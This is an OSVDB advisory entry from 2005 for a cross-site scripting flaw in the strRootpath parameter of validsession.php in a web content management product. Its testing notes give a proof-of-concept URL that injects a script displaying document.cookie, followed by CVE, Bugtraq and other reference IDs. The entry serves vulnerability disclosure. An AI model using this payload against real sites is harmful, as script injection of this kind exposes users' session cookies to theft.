web content management validsession.php strRootpath Variable XSS

2005-07-29T09:03:29
ID OSVDB:18522
Type osvdb
Reporter OSVDB
Modified 2005-07-29T09:03:29

Description

Manual Testing Notes

http://[target]/[path]/Includes/validsession.php?strRootpath=');}//%20--></script><script>alert(document.cookie)</script>

References:

Vendor URL: http://www.web-content-management.us/
Security Tracker: 1014616
Secunia Advisory ID: 16317
Related OSVDB ID: 18524
Related OSVDB ID: 18523
Other Advisory URL: http://www.rgod.altervista.org/webc.html
ISS X-Force ID: 21689
CVE-2005-2488
Bugtraq ID: 14464